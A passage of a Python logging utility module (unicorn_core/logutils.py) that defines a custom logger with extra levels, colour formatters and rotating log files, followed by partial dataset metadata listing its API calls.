self._log(logging.H3, msg, args, **kwargs)\n \n def table(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.TABLE):\n msg = logutils_conversions._table_to_string(msg)\n self._log(logging.TABLE, msg, args, **kwargs)\n \n def frame(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.FRAME):\n msg = logutils_conversions._string_to_framed_string(msg)\n self._log(logging.FRAME, msg, args, **kwargs)\n \n def com(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def comment(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def plain(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.PLAIN):\n self._log(logging.PLAIN, msg, args, **kwargs)\n \n def verbose(self, msg, *args, **kwargs):\n if self.isEnabledFor(logging.VERBOSE):\n msg = logutils_conversions._verbose_message_to_string(msg)\n self._log(logging.VERBOSE, msg, args, **kwargs)\n\n def configure(self, log_config={}, file=\"\"):\n \"\"\"\n Common function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n\n # TODO function that initialize default values\n log_c = {\n \"log_fmt\": \"%(asctime)-16s - %(levelname)-8s - %(message)s\",\n \"log_path\": \"\",\n \"log_colors\": True,\n \"log_default_font\": \"\",\n \"log_default_back\": \"\",\n \"log_default_style\": \"\",\n \"log_debug_font\": \"white\",\n \"log_debug_back\": \"\",\n \"log_debug_style\": \"\",\n \"log_info_font\": \"green\",\n \"log_info_back\": \"\",\n \"log_info_style\": \"bright\",\n \"log_warning_font\": \"yellow\",\n \"log_warning_back\": \"\",\n \"log_warning_style\": \"bright\",\n \"log_error_font\": \"red\",\n \"log_error_back\": \"\",\n \"log_error_style\": \"bright\",\n \"log_critical_font\": \"white\",\n \"log_critical_back\": \"red\",\n \"log_critical_style\": \"bright\",\n \"log_header_font\": \"cyan\",\n \"log_header_back\": \"\",\n \"log_header_style\": \"bright\",\n \"log_verbose_font\": \"magenta\",\n \"log_verbose_back\": \"\",\n \"log_verbose_style\": \"bright\",\n \"log_strong_font\": \"yellow\",\n \"log_strong_back\": \"black\",\n \"log_strong_style\": \"\",\n \"log_send_font\": \"cyan\",\n \"log_send_back\": \"\",\n \"log_send_style\": \"bright\",\n \"log_receive_font\": \"yellow\",\n \"log_receive_back\": \"\",\n \"log_receive_style\": \"bright\",\n \"log_file_max_size\": \"0\",\n \"log_file_max_count\": \"0\",\n \"log_width\": 120,\n \"test_file\": \"\",\n \"file\": \"\" }\n log_c.update(log_config)\n logutils_conversions.LINE_WIDTH = log_c[\"log_width\"]\n if any(sub in str(log_c[\"log_colors\"]).lower() for sub in [\"1\", \"enable\", \"true\", \"yes\"]):\n log_c[\"log_colors\"] = True\n\n # TODO move to function close handlers\n handlers = self.handlers[:]\n for hdlr in handlers:\n hdlr.close()\n self.removeHandler(hdlr)\n\n # TODO move to function set logging level, it would be good to use configuration parameter instead of directly parsing sys.argv\n if any(\"debug\" in ar.lower() for ar in sys.argv):\n level_to_set = logging.DEBUG\n else:\n level_to_set = logging.INFO\n self.setLevel(logging.DEBUG)\n self.propagate = 0\n\n # TODO move to function set formatter\n fmt = log_c[\"log_fmt\"]\n\n if colorama and log_c[\"log_colors\"] is True:\n handler = ColorStreamHandler(sys.stdout)\n cc_fmt = ColorFormatter(fmt)\n cc_fmt.configure(log_c)\n handler.setFormatter(cc_fmt)\n else:\n handler = logging.StreamHandler()\n c_fmt = CustomFormatter(fmt)\n handler.setFormatter(c_fmt)\n handler.setLevel(level_to_set)\n self.addHandler(handler)\n timestamp = datetime.now().strftime(\"%Y-%m-%d_%H.%M.%S\")\n\n # TODO move to function set file handler\n log_dir_path = \"\"\n log_file_path = \"\"\n if log_c[\"log_path\"] and log_c[\"test_file\"]:\n log_dir_path = log_c[\"log_path\"]\n if os.path.isabs(log_dir_path): pass\n else: \n log_dir_path = os.path.realpath(os.path.join(os.path.dirname(__file__), \"..\", log_dir_path))\n testname = os.path.basename(log_c[\"test_file\"])\n try:\n testname = os.path.splitext(testname)[0]\n except Exception as e:\n print(\"Could not remove extension from file named: {}. Skipping.\".format(testname))\n log_dir_name = \"{}_{}\".format(testname, timestamp)\n log_dir_path = os.path.realpath(os.path.join(log_c[\"log_path\"], log_dir_name))\n log_file_name = \"{}_{}_{}.log\".format(testname, timestamp, self.name)\n log_file_path = os.path.join(log_dir_path, log_file_name)\n elif file:\n log_dir_path = os.path.dirname(file)\n log_file_path = file\n if log_dir_path and not os.path.exists(log_dir_path):\n try:\n os.makedirs(log_dir_path)\n except Exception as ex:\n print(\"ERROR: Log directory {} could not be created\".format(log_dir_path))\n print(\n \"Please ensure that\\n\\t\\\"{}\\\"\\ndirectory exists or Unicorn has sufficient rights to create it.\".format(\n log_dir_path))\n raise ex from None\n\n if log_c[\"log_path\"] and file and os.path.isfile(file):\n shutil.copyfile(file, log_file_path)\n os.remove(file)\n\n if log_file_path:\n lfmc_text = str(log_c[\"log_file_max_size\"]).upper()\n lfmc_num = int(''.join(str(d) for d in [int(s) for s in list(lfmc_text) if s.isdigit()]))\n if lfmc_text.endswith(\"MB\") or lfmc_text.endswith(\"M\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024 * 1024\n elif lfmc_text.endswith(\"KB\") or lfmc_text.endswith(\"K\"):\n log_c[\"log_file_max_size\"] = lfmc_num * 1024\n else:\n log_c[\"log_file_max_size\"] = lfmc_num\n if log_file_path:\n f_fmt = CustomFormatter(fmt)\n if log_c[\"log_file_max_size\"] > 0:\n from logging.handlers import RotatingFileHandler\n fh = RotatingFileHandler(log_file_path, maxBytes=log_c[\"log_file_max_size\"],\n backupCount=int(log_c[\"log_file_max_count\"]) )\n else:\n fh = logging.FileHandler(log_file_path)\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(f_fmt)\n self.addHandler(fh)\n return self\n\n def close(self):\n \"\"\"\n Function to remove handlers and shut down the logger\n Args:\n logger (logger object)\n Returns:\n None\n \"\"\"\n try:\n handlers = self.handlers[:]\n for handler in handlers:\n handler.close()\n self.removeHandler(handler)\n del self\n except Exception as ex:\n pass \n\n\nclass ColorStreamHandler(logging.StreamHandler):\n \"\"\"\n StreamHandler with customized color output.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n def emit(self, record):\n try:\n loglock.acquire()\n message = self.format(record)\n self.stream.write(message)\n self.stream.write(getattr(self, 'terminator', '\\n'))\n self.flush()\n except (KeyboardInterrupt, SystemExit) as e:\n raise e\n except Exception:\n self.handleError(record)\n finally:\n loglock.release()\n\nclass CustomFormatter(logging.Formatter):\n \"\"\"\n Formatter which selects modified log formats depending on the message LEVEL\n \"\"\"\n def __init__(self, fmt):\n self.general_fmt = \"%(asctime)-16s - %(levelname)-8s - %(message)s\"\n self.plain_fmt = \"%(asctime)-16s - %(message)s\"\n self.no_fmt = \"%(message)s\"\n # self.verbose_fmt = \"%(asctime)-16s - [ Logged from: %(module)s; line: %(lineno)d ]:\\n %(msg)s\"\n self.verbose_fmt = \"\\n %(msg)s\"\n if fmt: \n self.general_fmt = fmt\n super().__init__(fmt = self.general_fmt)\n\n def format(self, record, *args, **kwargs):\n new_record = copy.copy(record)\n format_orig = self._style._fmt\n if new_record.levelno == logging.DEBUG:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.INFO:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.WARNING or new_record.levelno == logging.WARN:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.ERROR or new_record.levelno == logging.CRITICAL:\n self._style._fmt = self.general_fmt\n elif new_record.levelno == logging.H1:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.H2:\n self._style._fmt = self.plain_fmt\n elif new_record.levelno == logging.H3:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.TABLE:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.FRAME:\n self._style._fmt = self.no_fmt\n elif new_record.levelno == logging.PLAIN:\n self._style._fmt = self.plain_fmt \n elif new_record.levelno == logging.VERBOSE:\n self._style._fmt = self.verbose_fmt\n else:\n self._style._fmt = self.no_fmt\n result = logging.Formatter.format(self, new_record)\n self._style._fmt = format_orig\n return result\n\n\nclass ColorFormatter(CustomFormatter):\n \"\"\"\n Formatter which adds colors to messages going to the screen depending on message LEVEL\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.color_send = \"\"\n self.color_receive = \"\"\n self.color_strong = \"\"\n self.regex_send = re.compile(\"(.*?\\|.?\\-\\-\\>.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_receive = re.compile(\"(.*?\\|.?\\<\\-\\-.*?\\|.)(.*)\", re.IGNORECASE | re.MULTILINE)\n self.regex_strong = re.compile(\"\\[(.*)\\]\", re.IGNORECASE | re.MULTILINE)\n\n def create_color_entry(self, colorama_assignments, style_name_lowercase):\n \"\"\"Method which assigns colorama style basing on global configuration stored in self.log_conf, \n styles dictionary colorama_dict and name of the style defined in style_name_lowercase\n self.log_conf - generated framework configuration for the logs (all parameters with log_ prefix) \n - taken from global config file, local config file, command line args and default settings.\n Args:\n colorama_assignments(dict) - assignments of logging level and colorama style\n style_name_lowercase(string) - value of configuration parameter. e.g. yellow\n Returns:\n colorama style(colorama attribute) - e.g. colorama.Style.BRIGHT\"\"\"\n try:\n log_param_value = self.log_conf[style_name_lowercase]\n except KeyError as e:\n log_param_value = \"\"\n try:\n return colorama_assignments[log_param_value]\n except (KeyError, Exception) as e:\n print(\"WARNING: Style or color name \\\"{}\\\" for {} was not recognized. Empty value will be used.\".format(log_param_value, style_name_lowercase))\n return \"\" \n \n def configure(self, log_conf):\n \"\"\"\n Method to set configuration of ColorFormatter from dictionary with log_ parameters.\n Args:\n log_conf(dictionary): configuration of the logger, keys are prefixed with log_\n Returns:\n None\n \"\"\"\n self.log_conf = log_conf\n self.level_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE\n }\n self.message_styles = {\n logging.DEBUG: colorama.Style.BRIGHT + colorama.Fore.WHITE,\n logging.INFO: colorama.Style.BRIGHT + colorama.Fore.GREEN,\n logging.WARN: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.WARNING: colorama.Style.BRIGHT + colorama.Fore.YELLOW,\n logging.ERROR: colorama.Style.BRIGHT + colorama.Fore.RED,\n logging.CRITICAL: colorama.Style.BRIGHT + colorama.Back.RED + colorama.Fore.WHITE,\n logging.H1: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H2: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.H3: colorama.Style.BRIGHT + colorama.Fore.CYAN,\n logging.VERBOSE: colorama.Style.BRIGHT + colorama.Fore.MAGENTA,\n logging.FRAME: \"\",\n logging.TABLE: \"\",\n logging.PLAIN: \"\"\n }\n self.colorama_styles = {\n \"bright\": colorama.Style.BRIGHT,\n \"dim\": colorama.Style.DIM,\n \"none\": \"\",\n \"\": \"\"\n } \n self.colorama_backgrounds = {\n \"red\": colorama.Back.RED,\n \"white\": colorama.Back.WHITE,\n \"green\": colorama.Back.GREEN,\n \"yellow\": colorama.Back.YELLOW,\n \"blue\": colorama.Back.BLUE,\n \"cyan\": colorama.Back.CYAN,\n \"magenta\": colorama.Back.MAGENTA,\n \"black\": colorama.Back.BLACK,\n \"\": \"\"\n } \n self.colorama_fonts = {\n \"red\": colorama.Fore.RED,\n \"white\": colorama.Fore.WHITE,\n \"green\": colorama.Fore.GREEN,\n \"yellow\": colorama.Fore.YELLOW,\n \"blue\": colorama.Fore.BLUE,\n \"cyan\": colorama.Fore.CYAN,\n \"magenta\": colorama.Fore.MAGENTA,\n \"black\": colorama.Fore.BLACK,\n \"\": \"\"\n }\n self.message_styles = {\n logging.DEBUG: self.create_color_entry(self.colorama_styles, \"log_debug_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_debug_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_debug_font\"),\n logging.INFO: self.create_color_entry(self.colorama_styles, \"log_info_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_info_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_info_font\"),\n logging.WARN: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.WARNING: self.create_color_entry(self.colorama_styles, \"log_warning_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_warning_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_warning_font\"),\n logging.ERROR: self.create_color_entry(self.colorama_styles, \"log_error_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_error_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_error_font\"),\n logging.CRITICAL: self.create_color_entry(self.colorama_styles, \"log_critical_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_critical_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_critical_font\"),\n logging.H1: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"),\n logging.H2: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.H3: self.create_color_entry(self.colorama_styles, \"log_header_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_header_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_header_font\"), \n logging.VERBOSE: self.create_color_entry(self.colorama_styles, \"log_verbose_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_verbose_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_verbose_font\") \n }\n self.level_styles = dict(self.message_styles)\n self.color_send = self.create_color_entry(self.colorama_styles, \"log_send_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_send_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_send_font\")\n self.color_receive = self.create_color_entry(self.colorama_styles, \"log_receive_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_receive_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_receive_font\")\n self.color_strong = self.create_color_entry(self.colorama_styles, \"log_strong_style\") \\\n + self.create_color_entry(self.colorama_backgrounds, \"log_strong_back\") \\\n + self.create_color_entry(self.colorama_fonts, \"log_strong_font\")\n \n def _apply_special_styles(self, message):\n \"\"\"\n Method to apply special style to the message which matches expected format (based on regex search).\n It is called from \"format\" method\n It returns same message if no special match is found.\n Args:\n message (String): log entry to add the style\n Returns:\n message (String): colorized log entry\n \"\"\"\n if self.regex_send.search(message):\n return self.regex_send.sub(\"\\\\1\" + self.color_send + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_receive.search(message):\n return self.regex_receive.sub(\"\\\\1\" + self.color_receive + \"\\\\2\" + colorama.Style.RESET_ALL, str(message))\n elif self.regex_strong.search(message):\n return self.regex_strong.sub(self.color_strong + \"[\\\\1]\" + colorama.Style.RESET_ALL, str(message))\n else:\n return message\n\n def format(self, record, *args, **kwargs):\n \"\"\"\n Method to apply all color formats basing on self.level_styles and self.message_styles dictionaries.\n Args:\n record (String): log entry to add the style\n Returns:\n result (String): formatted log entry\n \"\"\" \n new_record = copy.copy(record) \n if isinstance(new_record.msg, str) and new_record.levelno == logging.PLAIN:\n new_record.msg = self._apply_special_styles(new_record.msg) \n if new_record.levelno in self.level_styles:\n new_record.levelname = \"{color_begin}{level}{color_end}\".format(\n color_begin = self.level_styles[new_record.levelno],\n level = new_record.levelname,\n color_end = colorama.Style.RESET_ALL,\n ) \n if new_record.levelno in self.message_styles:\n new_record.msg = \"{color_begin}{msg}{color_end}\".format(\n color_begin = self.message_styles[new_record.levelno],\n msg = new_record.msg,\n color_end = colorama.Style.RESET_ALL,\n )\n result = super(ColorFormatter, self).format(new_record, *args, **kwargs)\n return result\n\nlogging.setLoggerClass(EnhancedLogger)\n \n\ndef init_logger(name = \"log\", log_config = {}, file = \"\"): \n \"\"\"\n External function which initializes logger, makes target log directories and creates file.\n Args:\n name (String) - name of the logger\n log_config (dict) - optional - configuration for the logger. New entries will override default configuration.\n file (String) - optional - fixed path to the logfile\n Returns:\n logging object\n \"\"\"\n logger = logging.getLogger(name)\n logger.configure(log_config, file)\n return logger\n \n\nif __name__ == \"__main__\":\n\n logger = init_logger(\"test\")\n logger = init_logger(\"test\")\n\n logger.debug(\"This is a debug!\")\n logger.info(\"This is an info!\")\n logger.warning(\"This is a warning!\")\n logger.error(\"This is an error!\")\n logger.critical(\"This is a critical!\")\n\n logger.h1(\"1. Header\")\n logger.h2(\"1.1. Header\")\n logger.h3(\"1.1.1 Header\")\n\n logger.table([[\"Name\", \"Value\"],[1,2],[10,20],[30,40]])\n logger.com(\"Path [ AAA ] format\")\n logger.com(\"| --> D | Send format\")\n logger.com(\"| <-- D | Receive format\")\n logger.verbose([\n \"This is a long message\",\n \"which explains in details\",\n \"what is going on here\"\n ])\n logger.frame(\"Used for generic messages which should be emphasized\")\n logger.frame(\"Used for generic messages which should be emphasized\\n - like communication with the module\")\n logger.frame([\n \"Used for generic messages which should be emphasized\",\n \"- like communication with the module\"])\n try:\n i = 3/0\n except Exception as e:\n logger.verbose(\"You tried to do action which is not allowed. Handling exception.\")\n logger.info(\"[ c:\\\\temp ]\")\n", "sub_path": "unicorn_core/logutils.py", "file_name": "logutils.py", "file_ext": "py", "file_size_in_byte": 24390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "colorama.init", "line_number": 28, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 30, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 34, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 35, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.getLoggerClass", "line_number": 47, "usage_type": "call"}, {"api_name": "logging.NOTSET", "line_number": 51, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 53, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 53, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 54, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 54, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 55, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 55, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 56, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 56, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 57, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 57, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 58, "usage_type": "call"}, {"api_name": "logging.PLAIN", "line_number": 58, "usage_type": "attribute"}, {"api_name": "logging.addLevelName", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 62, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h1", "line_number": 63, "usage_type": "call"}, {"api_name": "logging.H1", "line_number": 64, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 67, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h2", "line_number": 68, "usage_type": "call"}, {"api_name": "logging.H2", "line_number": 69, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 72, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_h3", "line_number": 73, "usage_type": "call"}, {"api_name": "logging.H3", "line_number": 74, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "logutils_conversions._table_to_string", "line_number": 78, "usage_type": "call"}, {"api_name": "logging.TABLE", "line_number": 79, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 82, "usage_type": "attribute"}, {"api_name": "logutils_conversions._string_to_framed_string", "line_number": 83, "usage_type": "call"}, {"api_name": "logging.FRAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 87, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 88, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 91, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 92, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 95, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 96, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 99, "usage_type": "attribute"}, {"api_name": "logutils_conversions._verbose_message_to_string", "line_number": 100, "usage_type": "call"}, {"api_name": "logging.VERBOSE", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logutils_conversions.LINE_WIDTH", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 169, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 170, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 172, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 185, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "name"}, {"api_name": "os.path.isabs", "line_number": 197, "usage_type": "call"}, {"api_name": "os.path", "line_number": 197, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 200, "usage_type": "call"}, {"api_name": "os.path", "line_number": 200, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 206, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 208, "usage_type": "call"}, {"api_name": "os.path", "line_number": 208, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 223, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 224, "usage_type": "call"}, {"api_name": "logging.handlers.RotatingFileHandler", "line_number": 239, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 243, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 266, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 286, "usage_type": "attribute"}, {"api_name": "copy.copy", "line_number": 301, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 303, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 305, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 307, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 309, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 311, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 313, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 315, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 317, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 319, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 323, "usage_type": "attribute"}, {"api_name": "logging.Formatter.format", "line_number": 327, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 327, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 341, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 341, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 342, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 342, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 343, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 343, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 375, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 376, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 377, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 378, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 379, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 375, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 376, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 377, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 378, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 379, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 380, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 380, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 383, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 384, "usage_type": "attribute"}, {"api_name": "logging.WARN", "line_number": 385, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 386, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 387, "usage_type": "attribute"}, {"api_name": "logging.CRITICAL", "line_number": 388, "usage_type": "attribute"}, {"api_name": "logging.H1", "line_number": 389, "usage_type": "attribute"}, {"api_name": "logging.H2", "line_number": 390, "usage_type": "attribute"}, {"api_name": "logging.H3", "line_number": 391, "usage_type": "attribute"}, {"api_name": "logging.VERBOSE", "line_number": 392, "usage_type": "attribute"}, {"api_name": "logging.FRAME", "line_number": 393, "usage_type": "attribute"}, {"api_name": "logging.TABLE", "line_number": 394, "usage_type": "attribute"}, {"api_name": "logging.PLAIN", "line_number": 395, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 383, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 384, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 385, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 386, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 387, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Back", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 388, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 389, "usage_type": "attribute"}, {"api_name": "colorama.Style", "line_number": 390, "usage_type": "attribute"}, {"api_name": "colorama.Fore", "line_number": 390, "usage_type": 